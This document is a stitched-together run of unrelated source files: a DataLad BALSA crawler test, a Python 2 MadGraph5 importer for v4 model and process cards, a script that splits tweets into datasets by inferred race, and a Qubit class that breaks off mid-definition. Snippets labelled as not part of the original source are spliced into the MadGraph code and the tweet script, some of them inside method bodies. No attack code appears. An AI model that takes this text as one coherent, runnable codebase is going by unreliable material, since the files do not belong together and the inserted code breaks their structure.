'./.datalad/crawl/statuses/incoming.json', './.datalad/meta/balsa.json', './.datalad/config', './file1.nii', './dir1/file2.nii', } eq_(set(all_files), target_files) # this test should raise warning that canonical tarball does not have one of the files listed # and that a listed file differs in 
content _PLUG_HERE = '' @with_tree(tree={ 'study': { 'show': { 'WG33': { 'index.html': """ Download (172 MB) file1.nii dir1 / file2.nii file1b.nii %s """ % _PLUG_HERE, }, }, 'download': { 'WG33.tar.gz': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } } }, 'file': { 'show': { 'JX5V': { 'index.html': """ Download (120 MB) """ }, 'R1BX': { 'index.html': """ Download (26 MB) """ }, 'GSRD': { 'index.html': """ Download (26 MB) """ } }, 'download': { 'file1.nii': "content of file1.nii is different", 'file1b.nii': "content of file1b.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } }, }, archives_leading_dir=False ) @serve_path_via_http @with_tempfile @with_tempfile @known_failure_direct_mode #FIXME @known_failure_v6 #FIXME def test_balsa_pipeline2(ind, topurl, outd, clonedir): list(initiate_dataset( template="balsa", dataset_name='dataladtest-WG33', path=outd, data_fields=['dataset_id'])({'dataset_id': 'WG33'})) with chpwd(outd): with swallow_logs(new_level=logging.WARN) as cml: pipeline = ofpipeline('WG33', url=topurl) out = run_pipeline(pipeline) assert_true('The following files do not exist in the canonical tarball, ' 'but are individually listed files and will not be kept:' in cml.out) assert_true('./file1.nii varies in content from the individually downloaded ' 'file with the same name, it is removed and file from canonical ' 'tarball is kept' in cml.out) eq_(len(out), 1) with chpwd(outd): eq_(set(glob('*')), {'dir1', 'file1.nii'}) all_files = sorted(find_files('.')) fpath = opj(outd, 'file1.nii') ok_file_has_content(fpath, "content of file1.nii") ok_file_under_git(fpath, annexed=True) fpath2 = opj(outd, 'dir1', 'file2.nii') ok_file_has_content(fpath2, "content of file2.nii") ok_file_under_git(fpath2, annexed=True) target_files = { './.datalad/config', './.datalad/crawl/crawl.cfg', './.datalad/crawl/statuses/incoming.json', './.datalad/meta/balsa.json', './file1.nii', './dir1/file2.nii', } eq_(set(all_files), target_files) 1-10 ################################################################################ # # Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors # # This file is a part of the MadGraph5_aMC@NLO project, an application which # automatically generates Feynman diagrams and matrix elements for arbitrary # high-energy processes in the Standard Model and beyond. # # It is subject to the MadGraph5_aMC@NLO license which should accompany this # distribution. 
# # For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch # ################################################################################ from madgraph.core import base_objects """Methods and classes to import v4 format model files.""" import fractions import logging import os import re from madgraph import InvalidCmd, MG4DIR, ReadWrite import madgraph.core.color_algebra as color import madgraph.iolibs.files as files import madgraph.iolibs.save_load_object as save_load_object import madgraph.various.misc as misc from madgraph.core.base_objects import Particle, ParticleList from madgraph.core.base_objects import Interaction, InteractionList logger = logging.getLogger('madgraph.import_v4') #=============================================================================== # import_v4model #=============================================================================== def import_model(model_path, mgme_dir = MG4DIR, absolute=True): """create a model from a MG4 model directory.""" # Check for a valid directory model_path_old = model_path model_path = find_model_path(model_path, mgme_dir, absolute) files_list = [os.path.join(model_path, 'particles.dat'),\ os.path.join(model_path, 'interactions.dat')] for filepath in files_list: if not os.path.isfile(filepath): if not absolute: raise InvalidCmd, "%s directory is not a valid v4 model" % \ (model_path) else: return import_model(model_path_old, mgme_dir, False) # use pickle files if defined if files.is_uptodate(os.path.join(model_path, 'model.pkl'), files_list): model = save_load_object.load_from_file( \ os.path.join(model_path, 'model.pkl')) if model.has_key('version_tag') and model.get('version_tag') == os.path.realpath(model_path) + str(misc.get_pkg_info()): return model, model_path model = base_objects.Model() model.set('particles',files.read_from_file( \ os.path.join(model_path, 'particles.dat'), read_particles_v4)) model.set('interactions',files.read_from_file( \ os.path.join(model_path, 'interactions.dat'), read_interactions_v4, model['particles'])) model.set('name', os.path.split(model_path)[-1]) # save in a pickle files to fasten future usage if ReadWrite: try: save_load_object.save_to_file(os.path.join(model_path, 'model.pkl'), model) except Exception: logger.warning("fail to write %s. 
This is perfectly fine will just prevent speed boost in future load of this model" %\ os.path.join(model_path, 'model.pkl')) return model, model_path def find_model_path(model_path, mgme_dir, absolute=True): """Find the path to the model, starting with path model_path.""" # treat simple case (model_path is a valid path/ mgme_dir doesn't exist) if os.path.isdir(model_path) and absolute: return model_path elif mgme_dir and os.path.isdir(os.path.join(mgme_dir, 'models', model_path + "_v4")): model_path = os.path.join(mgme_dir, 'models', model_path + "_v4") elif mgme_dir and os.path.isdir(os.path.join(mgme_dir, 'Models', model_path)): model_path = os.path.join(mgme_dir, 'Models', model_path) elif not mgme_dir: error_text = "Path %s is not a valid pathname\n" % model_path error_text += "and no MG_ME installation detected in order to search in Models" raise InvalidCmd(error_text) # Try to build the valid path path_possibilities = [os.path.join(mgme_dir, 'Models', model_path), os.path.join(mgme_dir, 'models', model_path + "_v4"), os.path.join(mgme_dir, 'models', model_path) ] for path in path_possibilities: if os.path.exists(path) and \ not os.path.exists(os.path.join(path, 'particles.py')): return path # No valid path found raise InvalidCmd("Path %s is not a valid pathname" % model_path) #=============================================================================== # read_particles_v4 #=============================================================================== def read_particles_v4(fsock): """Read a list of particle from stream fsock, using the old v4 format""" spin_equiv = {'s': 1, 'f': 2, 'v': 3, 't': 5} color_equiv = {'s': 1, 't': 3, '6': 6, 'o': 8} line_equiv = {'d': 'dashed', 's': 'straight', 'w': 'wavy', 'c': 'curly'} logger.info('load particles') mypartlist = ParticleList() for line in fsock: mypart = Particle() if line.find("MULTIPARTICLES") != -1: break # stop scanning if old MULTIPARTICLES tag found line = line.split("#", 2)[0] # remove any comment line = line.strip() # makes the string clean if line != "": values = line.split() if len(values) != 9: # Not the right number tags on the line raise ValueError, \ "Unvalid initialization string:" + line else: try: mypart.set('name', values[0].lower()) mypart.set('antiname', values[1].lower()) if mypart['name'] == mypart['antiname']: mypart['self_antipart'] = True if values[2].lower() in spin_equiv.keys(): mypart.set('spin', spin_equiv[values[2].lower()]) else: raise ValueError, "Invalid spin %s" % \ values[2] if values[3].lower() in line_equiv.keys(): mypart.set('line', line_equiv[values[3].lower()]) else: raise ValueError, \ "Invalid line type %s" % values[3] mypart.set("mass", values[4]) mypart.set("width", values[5]) if values[6].lower() in color_equiv.keys(): mypart.set('color', color_equiv[values[6].lower()]) else: raise ValueError, \ "Invalid color rep %s" % values[6] #mypart.set("texname", values[7]) mypart.set("pdg_code", int(values[8])) mypart.set('charge', 0.) #mypart.set('antitexname', mypart.get('texname')) except (Particle.PhysicsObjectError, ValueError), why: logger.warning("Warning: %s, particle ignored" % why) else: mypartlist.append(mypart) return mypartlist #=============================================================================== # read_interactions_v4 #=============================================================================== def read_interactions_v4(fsock, ref_part_list): """Read a list of interactions from stream fsock, using the old v4 format. 
Requires a ParticleList object as an input to recognize particle names.""" logger.info('load interactions') myinterlist = InteractionList() if not isinstance(ref_part_list, ParticleList): raise ValueError, \ "Object %s is not a valid ParticleList" % repr(ref_part_list) for line in fsock: myinter = Interaction() line = line.split("#", 2)[0] # remove any comment line = line.strip() # makes the string clean if line != "": # skip blank values = line.split() part_list = ParticleList() try: for str_name in values: curr_part = ref_part_list.get_copy(str_name.lower()) if isinstance(curr_part, Particle): # Look at the total number of strings, stop if # anyway not enough, required if a variable name # corresponds to a particle! (eg G) if len(values) >= 2 * len(part_list) + 1: part_list.append(curr_part) else: break # also stops if string does not correspond to # a particle name else: break if len(part_list) < 3: raise Interaction.PhysicsObjectError, \ "Vertex with less than 3 known particles found." # Flip part/antipart of first part for FFV, FFS, FFT vertices # according to v4 convention spin_array = [part['spin'] for part in part_list] if spin_array[:2] == [2, 2] and \ not part_list[0].get('self_antipart'): part_list[0]['is_part'] = not part_list[0]['is_part'] myinter.set('particles', part_list) # Give color structure # Order particles according to color # Don't consider singlets color_parts = sorted(enumerate(part_list), lambda p1, p2:\ p1[1].get_color() - p2[1].get_color()) color_ind = [(i, part.get_color()) for i, part in \ color_parts if part.get_color() !=1] colors = [c for i,c in color_ind] ind = [i for i,c in color_ind] # Set color empty by default myinter.set('color', []) if not colors: # All color singlets - set empty pass elif colors == [-3, 3]: # triplet-triplet-singlet coupling myinter.set('color', [color.ColorString(\ [color.T(ind[1], ind[0])])]) elif colors == [8, 8]: # octet-octet-singlet coupling my_cs = color.ColorString(\ [color.Tr(ind[0], ind[1])]) my_cs.coeff = fractions.Fraction(2) myinter.set('color', [my_cs]) elif colors == [-3, 3, 8]: # triplet-triplet-octet coupling myinter.set('color', [color.ColorString(\ [color.T(ind[2], ind[1], ind[0])])]) elif colors == [8, 8, 8]: # Triple glue coupling my_color_string = color.ColorString(\ [color.f(ind[0], ind[1], ind[2])]) my_color_string.is_imaginary = True myinter.set('color', [my_color_string]) elif colors == [-3, 3, 8, 8]: my_cs1 = color.ColorString(\ [color.T(ind[2], ind[3], ind[1], ind[0])]) my_cs2 = color.ColorString(\ [color.T(ind[3], ind[2], ind[1], ind[0])]) myinter.set('color', [my_cs1, my_cs2]) elif colors == [8, 8, 8, 8]: # 4-glue coupling cs1 = color.ColorString([color.f(0, 1, -1), color.f(2, 3, -1)]) #cs1.coeff = fractions.Fraction(-1) cs2 = color.ColorString([color.f(2, 0, -1), color.f(1, 3, -1)]) #cs2.coeff = fractions.Fraction(-1) cs3 = color.ColorString([color.f(1, 2, -1), color.f(0, 3, -1)]) #cs3.coeff = fractions.Fraction(-1) myinter.set('color', [cs1, cs2, cs3]) # The following line are expected to be correct but not physical validations # have been performed. So we keep it commented for the moment. # elif colors == [3, 3, 3]: # my_color_string = color.ColorString(\ # [color.Epsilon(ind[0], ind[1], ind[2])]) # myinter.set('color', [my_color_string]) # elif colors == [-3, -3, -3]: # my_color_string = color.ColorString(\ # [color.EpsilonBar(ind[0], ind[1], ind[2])]) # myinter.set('color', [my_color_string]) else: logger.warning(\ "Color combination %s not yet implemented." 
% \ repr(colors)) # Set the Lorentz structure. Default for 3-particle # vertices is empty string, for 4-particle pair of # empty strings myinter.set('lorentz', ['']) pdg_codes = sorted([part.get_pdg_code() for part in part_list]) # WWWW and WWVV if pdg_codes == [-24, -24, 24, 24]: myinter.set('lorentz', ['WWWW']) elif spin_array == [3, 3, 3, 3] and \ 24 in pdg_codes and - 24 in pdg_codes: myinter.set('lorentz', ['WWVV']) # gggg if pdg_codes == [21, 21, 21, 21]: myinter.set('lorentz', ['gggg1', 'gggg2', 'gggg3']) # go-go-g # Using the special fvigox routine provides the minus # sign necessary for octet Majorana-vector interactions if spin_array == [2, 2, 3] and colors == [8, 8, 8] and \ part_list[0].get('self_antipart') and \ part_list[1].get('self_antipart'): myinter.set('lorentz', ['go']) # If extra flag, add this to Lorentz if len(values) > 3 * len(part_list) - 4: myinter.get('lorentz')[0] = \ myinter.get('lorentz')[0]\ + values[3 * len(part_list) - 4].upper() # Use the other strings to fill variable names and tags # Couplings: special treatment for 4-vertices, where MG4 used # two couplings, while MG5 only uses one (with the exception # of the 4g vertex, which needs special treatment) # DUM0 and DUM1 are used as placeholders by FR, corresponds to 1 if len(part_list) == 3 or \ values[len(part_list) + 1] in ['DUM', 'DUM0', 'DUM1']: # We can just use the first coupling, since the second # is a dummy myinter.set('couplings', {(0, 0):values[len(part_list)]}) if myinter.get('lorentz')[0] == 'WWWWN': # Should only use one Helas amplitude for electroweak # 4-vector vertices with FR. I choose W3W3NX. myinter.set('lorentz', ['WWVVN']) elif values[len(part_list)] in ['DUM', 'DUM0', 'DUM1']: # We can just use the second coupling, since the first # is a dummy myinter.set('couplings', {(0, 0):values[len(part_list)+1]}) elif pdg_codes == [21, 21, 21, 21]: # gggg myinter.set('couplings', {(0, 0):values[len(part_list)], (1, 1):values[len(part_list)], (2, 2):values[len(part_list)]}) elif myinter.get('lorentz')[0] == 'WWWW': # Need special treatment of v4 SM WWWW couplings since # MG5 can only have one coupling per Lorentz structure myinter.set('couplings', {(0, 0):\ 'sqrt(' + values[len(part_list)] + \ '**2+' + \ values[len(part_list) + 1] + \ '**2)'}) else: #if myinter.get('lorentz')[0] == 'WWVV': # Need special treatment of v4 SM WWVV couplings since # MG5 can only have one coupling per Lorentz structure myinter.set('couplings', {(0, 0):values[len(part_list)] + \ '*' + \ values[len(part_list) + 1]}) #raise Interaction.PhysicsObjectError, \ # "Only FR-style 4-vertices implemented." 
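                    # Illustrative sketch (GWWA/GWWZ are assumed coupling
                    # names, not taken from a real model file): a v4 4-vertex
                    # listing the two couplings GWWA GWWZ is collapsed above
                    # into a single MG5 coupling, 'sqrt(GWWA**2+GWWZ**2)' for
                    # the WWWW Lorentz structure and 'GWWA*GWWZ' otherwise.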
# SPECIAL TREATMENT OF COLOR # g g sq sq (two different color structures, same Lorentz) if spin_array == [3, 3, 1, 1] and colors == [-3, 3, 8, 8]: myinter.set('couplings', {(0, 0):values[len(part_list)], (1, 0):values[len(part_list)]}) # Coupling orders - needs to be fixed order_list = values[2 * len(part_list) - 2: \ 3 * len(part_list) - 4] def count_duplicates_in_list(dupedlist): """return a dictionary with key the element of dupeList and with value the number of times that they are in this list""" unique_set = set(item for item in dupedlist) ret_dict = {} for item in unique_set: ret_dict[item] = dupedlist.count(item) return ret_dict myinter.set('orders', count_duplicates_in_list(order_list)) myinter.set('id', len(myinterlist) + 1) myinterlist.append(myinter) except Interaction.PhysicsObjectError, why: logger.error("Interaction ignored: %s" % why) return myinterlist #=============================================================================== # read_proc_card.dat (mg4 format) #=============================================================================== def read_proc_card_v4(fsock): """A simple function reading the files in fsock and returning a ProcCardv4Reader object. This function authorize to have the same syntax as for the other files treatment""" reader = ProcCardv4Reader(fsock) return reader class ParticleError(InvalidCmd): """ A class to carch the error""" pass class WrongFileFormat(InvalidCmd): """A specific class error for wrong V4 proc_card""" pass class ProcCardv4Reader(object): """read a proc_card.dat in the mg4 format and creates the equivalent routine for mg5""" #tag in the proc_card.dat which split the proc_card content # line pattern (remove comment at the end of the line) pat_line = re.compile(r"""^\s*(?P[^\#]*?)\s*(\#|$)""", re.DOTALL) def __init__(self, fsock): """init the variable""" self.process = [] # List of ProcessInfo self.model = "" # name of the model self.multipart = [] # list of the mg4 definition of multiparticle self.particles_name = set() # set of authorize particle name self.couplings_name = set() # set of mandatory couplings self.process_path = os.path.realpath(os.path.join( os.path.dirname(fsock.name), os.pardir)) # Reading the files and store the information in string format. 
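        # Illustrative sketch of the proc_card.dat layout parsed below
        # (an assumed minimal example: the section tags follow the Begin/End
        # regexes in analyze_v4_proc_card, the process line comes from the
        # analyze_process docstring, the model and multiparticle entries are
        # made up):
        #   # Begin PROCESS
        #   pp>h>WWj /a $u @3
        #   done
        #   # End PROCESS
        #   # Begin MODEL
        #   sm
        #   # End MODEL
        #   # Begin MULTIPARTICLES
        #   P uu~dd~g
        #   # End MULTIPARTICLES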
self.analyze_v4_proc_card(fsock) def analyze_v4_proc_card(self, fsock): """read the file and fullfill the variable with mg4 line""" proc_card = fsock.read() # store process information process_open = False process_re = re.search(\ r"^# Begin\s+PROCESS.*?^(?P.*)^# End\s+PROCESS", proc_card, re.MULTILINE|re.DOTALL) if not process_re: raise WrongFileFormat('No valid Begin...End PROCESS tags') model_re = re.search(\ r"^# Begin\s+MODEL.*?^(?P.+?)(\s+|$)^# End\s+MODEL", proc_card, re.MULTILINE|re.DOTALL) if not model_re: raise WrongFileFormat('No valid Begin...End MODEL tags') multiparticles_re = re.search(\ r"^# Begin\s+MULTIPARTICLES.*?^(?P.*)^# End\s+MULTIPARTICLES", proc_card, re.MULTILINE|re.DOTALL) if not multiparticles_re: raise WrongFileFormat('No valid Begin...End MULTIPARTICLES tags') process_lines = process_re.group('process').split('\n') for line in process_lines: # an 'end_coup' stop the current process, # 'done' finish the list of process analyze_line = self.pat_line.search(line) if analyze_line: data = analyze_line.group('info') #skip the comment if not data: continue if not process_open and 'done' not in data: process_open = True self.process.append(ProcessInfo(data)) elif 'end_coup' in data: process_open = False elif 'done' not in data: self.process[-1].add_coupling(data) self.model = model_re.group('model') multiparticles_lines = multiparticles_re.group('multiparticles').split('\n') for line in multiparticles_lines: analyze_line = self.pat_line.search(line) if analyze_line: line = analyze_line.group('info') #skip the comment if not line: continue data = line.split() self.particles_name.add(data[0].lower()) self.multipart.append(line) def extract_command_lines(self, model): """Return the MG5 command line corresponding to this proc_card the MG5 command import model is skipped (since the model should be loaded -it is one of the argument-)""" # extract useful information of the model self.extract_info_from_model(model) # use the model information for the splitting in particles of the mg4 #process line. 
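        # Illustrative sketch of the command lines this method returns
        # (assumed example; the define/generate bodies are made up and the
        # exact syntax produced by mg5_process_line is not shown here, but
        # the comment headers are the ones emitted below):
        #   ['# Define multiparticle labels',
        #    'define p u u~ d d~ g',
        #    '# Specify process(es) to run',
        #    'generate p p > h > w+ w- j',
        #    '# Output processes to MadEvent directory',
        #    'output -f']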
for process in self.process: process.analyze_process(self.particles_name) #Now we are in position to write the lines call lines = [] #first write the lines associate to the multiparticls definition if self.multipart: lines.append('# Define multiparticle labels') for multipart in self.multipart: data = self.separate_particle(multipart, self.particles_name) lines.append('define ' + ' '.join(data)) # secondly define the lines associate with diagram if self.process: lines.append('# Specify process(es) to run') for i, process in enumerate(self.process): if i == 0: lines.append('generate %s' % \ process.mg5_process_line(self.couplings_name)) else: lines.append('add process %s' % \ process.mg5_process_line(self.couplings_name)) #finally export the madevent output lines.append('# Output processes to MadEvent directory') lines.append('output -f') return lines def extract_info_from_model(self, model): """ creates the self.particles_name (list of all valid name) and self.couplings_name (list of all couplings)""" # add in self.particles_name (it contains normally the mulpart name #already) all the valid name of particle of the model for particle in model['particles']: self.particles_name.add(particle['name']) self.particles_name.add(particle['antiname']) # add in self.couplings_name the couplings name of the model for interaction in model['interactions']: for coupling in interaction['orders'].keys(): self.couplings_name.add(coupling) @staticmethod def separate_particle(line, possible_str): """ for a list of concatanate variable return a list of particle name""" line = line.lower() # Particle name are not case sensitive out = [] # list of the particles # The procedure to find particles is the following # - check if the combination of 4 string form a valid particle name # if it is, move of 4 characters and check for the next particles. # if not try with 3, 2, 1 # if still not -> exit. 
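# --- Illustrative sketch (not part of the original source) ---------------
# separate_particle (below) splits a concatenated MG4 particle string by
# trying the longest possible name first (4 characters, then 3, 2, 1).
# A hedged, standalone version of that greedy matching, with a hypothetical
# set of valid names:
def split_particles(line, valid_names):
    line = line.lower()
    out, pos = [], 0
    while pos < len(line):
        if line[pos].isspace():
            pos += 1
            continue
        for width in range(4, 0, -1):
            token = line[pos:pos + width]
            if token in valid_names:
                out.append(token)
                pos += width
                break
        else:
            raise ValueError('Invalid particle name near %r' % line[pos:pos + 4])
    return out

assert split_particles('ve~u', {'ve~', 'u'}) == ['ve~', 'u']
# --------------------------------------------------------------------------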
pos = 0 # current starting position old_pos = -1 # check that we don't have infinite loop line += ' ' #add 4 blank for security while pos < len(line) - 4: #Check for infinite loop if pos == old_pos: logging.error('Invalid particle name: %s' % \ line[pos:pos + 4].rstrip()) raise ParticleError('Invalid particle name %s' % line[pos:pos + 4].rstrip()) old_pos = pos # check for pointless character if line[pos] in [' ', '\n', '\t']: pos += 1 continue # try to find a match at 4(then 3/2/1) characters for i in range(4, 0, -1): if line[pos:pos + i] in possible_str: out.append(line[pos:pos + i]) pos = pos + i break return out class ProcessInfo(object): """This is the basic object for storing process information""" def __init__(self, line): """Initialize information""" self.particles = [] # list tuple (level, particle) self.couplings = {} # coupling -> max_order self.decays = [] # ProcessInfo of the decays self.tag = '' # tag of the process self.s_forbid = [] # list of particles forbids in s channel self.forbid = [] # list of particles forbids self.line = line # initialization line self.is_mg5_valid = False #some shortcut self.separate_particle = ProcCardv4Reader.separate_particle def analyze_process(self, particles_name): """Add a line information two format are possible (decay chains or not) pp>h>WWj /a $u @3 pp>(h>WW)j /a $u @3 """ line = self.line #extract the tag if '@' in line: split = line.split('@') line = split[0] self.tag = split[1] # check if we have a MG5 format if '/mg5/' in line: self.line = line.replace('/mg5/','') self.is_mg5_valid = True return if ',' in line or '=' in line: self.is_mg5_valid = True return # extract (S-)forbidden particle pos_forbid = line.find('/') pos_sforbid = line.find('$') # Select the restrictions (pos is -1 if not defined) #and remove the restrictions from the line if pos_forbid != -1 and pos_sforbid != -1: if pos_forbid > pos_sforbid : self.forbid = self.separate_particle(line[pos_forbid + 1:], \ particles_name) self.s_forbid = self.separate_particle(\ line[pos_sforbid + 1:pos_forbid], particles_name) line = line[:min(pos_forbid, pos_sforbid)] else: self.forbid = self.separate_particle(\ line[pos_forbid + 1:pos_sforbid], particles_name) self.s_forbid = self.separate_particle(line[pos_sforbid + 1:], \ particles_name) line = line[:min(pos_forbid, pos_sforbid)] # Same but if they are no S-forbidden particles elif pos_forbid != -1: self.forbid = self.separate_particle(line[pos_forbid + 1:], \ particles_name) line = line[:pos_forbid] # Same but if they are no forbidden particles elif pos_sforbid != -1: self.s_forbid = self.separate_particle(line[pos_sforbid + 1:], \ particles_name) line = line[:pos_sforbid] # Deal with decay chains, returns lines whitout the decay (and treat #the different decays. 
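# --- Illustrative sketch (not part of the original source) ---------------
# analyze_process above strips '@tag', then '/ ...' (forbidden particles)
# and '$ ...' (s-channel forbidden particles) from an MG4 process line.
# A hedged, simplified example of the same splitting on a hypothetical line:
def split_restrictions(line):
    tag = None
    if '@' in line:
        line, tag = line.split('@', 1)
    forbid = s_forbid = ''
    pos_f, pos_s = line.find('/'), line.find('$')
    cut = min(p for p in (pos_f, pos_s, len(line)) if p != -1)
    if pos_f != -1:
        forbid = line[pos_f + 1:pos_s if pos_s > pos_f else None].strip()
    if pos_s != -1:
        s_forbid = line[pos_s + 1:pos_f if pos_f > pos_s else None].strip()
    return line[:cut].strip(), forbid, s_forbid, tag

assert split_restrictions('pp>w+w-j /a $u @2') == ('pp>w+w-j', 'a', 'u', '2')
# --------------------------------------------------------------------------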
if '(' in line: line = self.treat_decay_chain(line, particles_name) #define the level of each particle level_content = line.split('>') for level, data in enumerate(level_content): particles = self.separate_particle(data, particles_name) if particles: [self.particles.append((level, name)) for name in particles] def treat_decay_chain(self, line, particles_name): """Split the information of the decays into a tree of ProcessInfo.""" level = 0 #depth of the decay chain out_line = '' # core process for character in line: if character == '(': level += 1 if level == 1: decay_line = "" # initialize a new decay info else: decay_line += '(' continue elif character == ')': level -= 1 if level == 0: #store the information self.decays.append(ProcessInfo(decay_line)) self.decays[-1].add_restrictions(self.forbid, self.s_forbid, None) self.decays[-1].analyze_process(particles_name) out_line += decay_line[:decay_line.find('>')] else: decay_line += ')' continue elif level: decay_line += character else: out_line += character return out_line def add_coupling(self, line): """Add the coupling information to the process""" data = line.split('=') self.couplings[data[0]] = int(data[1]) def add_restrictions(self, forbid, s_forbid, couplings): """Associate some restriction to this diagram""" self.forbid = forbid self.s_forbid = s_forbid self.couplings = couplings def mg5_process_line(self, model_coupling): """Return a valid mg5 format for this process """ if self.is_mg5_valid: return self.line text = '' # Write the process cur_level = 0 for level, particle in self.particles: if level > cur_level: text += '> ' cur_level += 1 text += '%s ' % particle # Write the constraints if self.s_forbid: text += '$ ' + ' '.join(self.s_forbid) + ' ' if self.forbid: text += '/ ' + ' '.join(self.forbid) + ' ' #treat decay_chains for decay in self.decays: decay_text = decay.mg5_process_line(model_coupling) if ',' in decay_text: text = text.rstrip() + ', (%s) ' % decay_text.strip() else: text = text.rstrip() + ', %s ' % decay_text.strip() # write the tag if self.tag: text += '@%s ' % self.tag if self.couplings: if not self.tag: text += '@0 ' #write the rules associate to the couplings text += self.mg5_couplings_line(model_coupling, len(self.particles)) return text.rstrip() def mg5_couplings_line(self, model_coupling, nb_part): """Return the assignment of coupling for this process""" out = '' for coupling in model_coupling: if self.couplings.has_key(coupling): # Need coupling for all cases, since might be decay chain out += '%s=%s ' % (coupling, self.couplings[coupling]) else: # if not define put to zero (mg4 default) out += '%s=0 ' % coupling return out import sys import sklearn.utils from tqdm import tqdm project = 'PATH/TO/PROJECT' sys.path.insert(0, project + '/src/models') from data_utils import get_data, CONF_LEVEL, normalize_text, to_file from twitter_utils import happy, sad, MENTION from data_handler import read_files SEED = 16 df = get_data(project + '/path/to/downloaded/twitteraae_all') emotions = happy + sad cleaned = df[~df.text.str.contains('|'.join(emotions))] cleaned = sklearn.utils.shuffle(cleaned, random_state=SEED) with open(project + '/data/processed/sent_race/vocab', 'r') as f: vocab = f.readlines() vocab = map(lambda s: s.strip(), vocab) vocab_d = {x: 0 for x in vocab} pos_wh, pos_aa, neg_wh, neg_aa = read_files(project + '/data/processed/sent_race/') prev_sent = {} for s in pos_wh + pos_aa + neg_wh + neg_aa: try: sen = ' '.join([str(vocab[w]) for w in s]) prev_sent[sen] = 0 except: pass def get_race(df, min_len=1): 
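# --- Illustrative sketch (not part of the original source) ---------------
# get_race below keeps a tweet only if it normalizes to at least `min_len`
# tokens, is not just a mention, uses only in-vocabulary tokens, and was not
# already seen.  A hedged, standalone version of that per-tweet filter
# (normalize_text, MENTION, vocab_d and prev_sent are the objects defined
# above; here they are passed in explicitly to keep the sketch self-contained):
def keep_tweet(text, min_len, normalize_text, MENTION, vocab_d, prev_sent):
    tokens = normalize_text(text)
    if len(tokens) < min_len:
        return None
    if len(set(tokens)) == 1 and tokens[0] == MENTION:
        return None          # tweet is nothing but @-mentions
    if not all(tok in vocab_d for tok in tokens):
        return None          # out-of-vocabulary token present
    if ' '.join(tokens) in prev_sent:
        return None          # duplicate of a sentence already used
    return tokens
# --------------------------------------------------------------------------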
wh_data = [] aa_data = [] white = df[(df.wh > CONF_LEVEL)] white = white.filter(items=['text']) for ind in tqdm(range(len(white))): try: t = normalize_text(white.iloc[ind].text) if len(t) < min_len: continue if len(set(t)) == 1 and t[0] == MENTION: continue if not all(x in vocab_d for x in t): continue try: s = ' '.join([w for w in t]) if s in prev_sent: continue except: continue wh_data.append(t) except: pass if len(wh_data) >= 100000: break print 'reached 100k after {0} tweets'.format(ind) aa = df[(df.aa > CONF_LEVEL)] aa = aa.filter(items=['text']) for ind in tqdm(range(len(aa))): try: t = normalize_text(aa.iloc[ind].text) if len(t) < min_len: continue if len(set(t)) == 1 and t[0] == MENTION: continue if not all(x in vocab_d for x in t): continue try: s = ' '.join([w for w in t]) if s in prev_sent: continue except: continue aa_data.append(t) except: pass if len(aa_data) >= 100000: break print 'reached 100k after {0} tweets'.format(ind) return wh_data, aa_data wh, aa = get_race(cleaned, 3) id2voc = dict(enumerate(vocab)) voc2id = {v: k for k, v in id2voc.iteritems()} pos_pos, neg_pos = aa[:50000], aa[50000:] pos_neg, neg_neg = wh[:50000], wh[50000:] to_file(project + '/data/processed/unseen_race/', voc2id, vocab, pos_pos, pos_neg, neg_pos, neg_neg) rheaparekh/Distributed_Quantum_Phase_Estimationinterlinq/objects/qubit.py10-100 from interlinq.utils import Constants from .operation import Operation class Qubit(object): """ Qubit object which stores the operations performed on it """ def __init__(self, computing_host_id: str, q_id: str, prepare_qubit: bool = True): """ Returns the important things for a qubit object in a quantum circuit Args: computing_host_id (str): ID of the computing host where the qubit is located q_id (str): ID of the qubit prepare_qubit (bool): Boolean field which indicates if the qubit should be prepared when initiated. This should be set to False for qubits which are created by sending/receiver EPR pairs """ self._computing_host_id = computing_host_id self._q_id = q_id self._operations = {} self._current_layer = 0 if prepare_qubit: # Prepare the qubits when initiated # prepare_qubits should be False when initiating a qubit with the # operations 'send_epr' or 'receive_epr' self._prepare() @property def q_id(self): """ Get the ID of the qubit Returns: (str): ID of the qubit """ return self._q_id @property def computing_host_id(self): """ Get the *computing_host_id* linked to the qubit Returns: (str): ID of the computing host where the qubit is located """ return self._computing_host_id @property def operations(self): """ Get the *operations* in the layer. Returns: (list): List of Operation objects, which contains information about the operation to be performed on the quantum circuit """ return self._operations @property def current_layer(self): """ Get the *current_layer*, which is the layer of the last operation on the qubit. 
Returns: (int): The layer number """ return self._current_layer def _update_operations(self, op: Operation): """ Update the list of operations performed on the qubit with the latest operation Args: op (Operation): Last operation performed on the qubit """ self._operations[self._current_layer] = op def _prepare(self): """ Operation to prepare the qubit """ op = Operation( name=Constants.PREPARE_QUBITS, qids=[self._q_id], computing_host_ids=[self.computing_host_id], ) self._update_operations(op) def update_layer(self, layer: int): """ Update the list of operations performed on the qubit with th Args: layer (int): Last operation performed on the qubit """ self._current_layer = layer def single(self, gate: str, gate_param: list = None): """ Operation to apply a single gate to the qubit Args: gate (str): Name of the single qubit gate to be applied gate_param (list): Parameter for rotational gates """ op = Operation( name=Constants.SINGLE, qids=[self.q_id], gate=gate, gate_param=gate_param, computing_host_ids=[self.computing_host_id], ) self.update_layer(self.current_layer + 1) self._update_operations(op) def two_qubit(self, gate, target_qubit, gate_param=None): """ Operation to apply a two qubit gate to the qubit Args: gate (str): Name of the single qubit gate to be applied target_qubit (Qubit): The other qubit on which the qubit gate is applied on. In case on control gates, this is the target qubit gate_param (iterable): Parameter for rotational gates """ computing_host_ids = [self.computing_host_id] if target_qubit.computing_host_id != self.computing_host_id: computing_host_ids.append(target_qubit.computing_host_id) op = Operation( name=Constants.TWO_QUBIT, qids=[self.q_id, target_qubit.q_id], gate=gate, gate_param=gate_param, computing_host_ids=computing_host_ids, ) if target_qubit.current_layer + 1 > self.current_layer + 1: target_qubit.update_layer(target_qubit.current_layer + 1) self.update_layer(target_qubit.current_layer + 1) else: target_qubit.update_layer(self.current_layer + 1) self.update_layer(self.current_layer + 1) self._update_operations(op) def classical_ctrl_gate(self, gate, bit_id, gate_param=None): """ Operation to apply a classical control gate to the qubit Args: gate (str): Name of the single qubit gate to be applied bit_id (str): ID of the bit which controls if the gate should be applied gate_param (list): Parameter for rotational gates """ op = Operation( name=Constants.CLASSICAL_CTRL_GATE, qids=[self._q_id], cids=[bit_id], gate=gate, gate_param=gate_param, computing_host_ids=[self.computing_host_id], ) self.update_layer(self.current_layer + 1) self._update_operations(op) def 